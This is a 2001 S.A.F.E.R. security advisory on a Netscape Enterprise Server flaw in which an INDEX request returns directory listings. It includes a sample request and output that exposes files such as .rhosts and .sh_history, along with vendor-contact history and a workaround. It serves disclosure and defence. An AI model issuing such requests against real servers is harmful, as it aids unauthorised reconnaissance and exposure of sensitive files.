[SAFER] Security Bulletin 010124.EXP.1.11

Type securityvulns
Reporter Securityvulns
Modified 2001-01-25T00:00:00


  S.A.F.E.R. Security Bulletin 010124.EXP.1.11

TITLE : Netscape Enterprise Server - INDEX request problem DATE : January 24, 2001 NATURE : Information gathering AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled


Problems exists that allows remote user to obtain directory listings on remote site running Web Publishing.


It is possible to obtain directory listing on the remote web server by issuing command:


Output looks like:

-- output start --

Trying Connected to www.example.org. Escape character is '^]'. INDEX / HTTP/1.0

HTTP/1.1 200 OK Server: Netscape-Enterprise/3.6 SP2 Date: Fri, 19 Jan 2001 12:37:26 GMT Content-type: text/plain

test directory 512 979859452 0 null null contact directory 512 979701766 0 null null index.html text/html 1467 979701461 268 null null mobile directory 512 979701775 0 null null service directory 512 979701801 0 null null .rhosts unknown 22 965727716 264 null null search directory 512 931316908 0 null null .sh_history unknown 1256 979723453 264 null null corporate directory 512 972989267 0 null null .cshrc unknown 418 975657629 264 null null .login unknown 674 975657629 264 null null .profile unknown 416 975657629 264 null null

-- output end --

INDEX request will not work on 'aliased' directories (like CGI directories and similar).


Netscape has been contacted on multiple occasions. First time, more than a year ago. Although other problems we have reported have been fixed, we have received no response for this issue - to date.

Workaround is to disable Web Publishing, or disable INDEX request (which will, most likely, break web publishing feature).


Emmanuel Gadaix <emmanuel@relaygroup.com> Vanja Hrustic <vanja@relaygroup.com> Fyodor Yarochkin <fyodor@relaygroup.com>

This advisory is also available at http://www.safermag.com/advisories/

S.A.F.E.R. - Security Alert For Enterprise Resources Copyright (c) 2001 The Relay Group http://www.safermag.com ---- security@relaygroup.com